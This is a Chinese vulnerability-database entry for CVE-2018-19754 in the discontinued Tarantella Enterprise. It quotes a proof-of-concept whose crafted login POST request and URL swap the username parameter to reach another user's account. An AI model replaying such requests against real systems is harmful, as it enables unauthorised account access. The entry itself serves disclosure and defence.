Tarantella Enterprise 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1417480 漏洞类型
发布时间 2018-12-03 更新时间 2018-12-03
CVE编号 CVE-2018-19754 CNNVD-ID CNNVD-201812-017
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018120013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201812-017
|漏洞详情
Tarantella Enterprise是一个数据和应用程序集中管理工具,提供Web管理接口,可以运行于大多数Unix和Linux平台。 Tarantella Enterprise 3.11之前版本中存在安全漏洞。攻击者可通过修改登录请求中的参数值利用该漏洞获取对用户账户的访问权限。
|漏洞EXP
Vulnerability found in 2009.

<!--
# Exploit Title: Security Bypass Access Control Vulnerability in Tarantella
Enterprise before 3.11
# Date: 30-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: the product is discontinued (vulnerability found in 2009)
# Version: Tarantella Enterprise before 3.11
# Tested on: All
# CVE : CVE-2018-19754
# Category: webapps


1. Description

Tarantella Enterprise before 3 3.11 allows a Bypass Access Control, the
application does not prevent one user from gaining access to another user's
by modifying the parameter value in a login request.


2. Proof of Concept

Send POST petition like:

POST
/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html
HTTP/1.1
Accept: */*
Referer: https://XXXX.XXXX:444/html/form_ttaXXXX.html
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.1; .NET CLR 2.0.50727)
Host: ttarima.cnso
Content-Length: 61
Connection: Keep-Alive
Cache-Control: no-cache

action=bootstrap&pg=index.html&px=DIRECT&un=<usename>&ms=unique

Where the parameter un is the username you know. You recive the message:

"The content of this file must be language independent! This applet
immediately loads a new document in a named frame (here WebtopFrame), which
will be something like: ../logintheme/clientcap/index.html. The logintheme
is determinated from the appropiate attribute in the datastore. -->"

And now, change the username to access to application:

https://XXX.XXX/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html?action=bootstrap&pg=index.html&px=DIRECT&un=
<valid_username>&ms=unique


3. Solution:

The product is discontinued.
https://www.oracle.com/us/assets/lifetime-support-hardware-301321.pdf

-->


|参考资料

来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/150542/Tarantella-Enterprise-Security-Bypass.html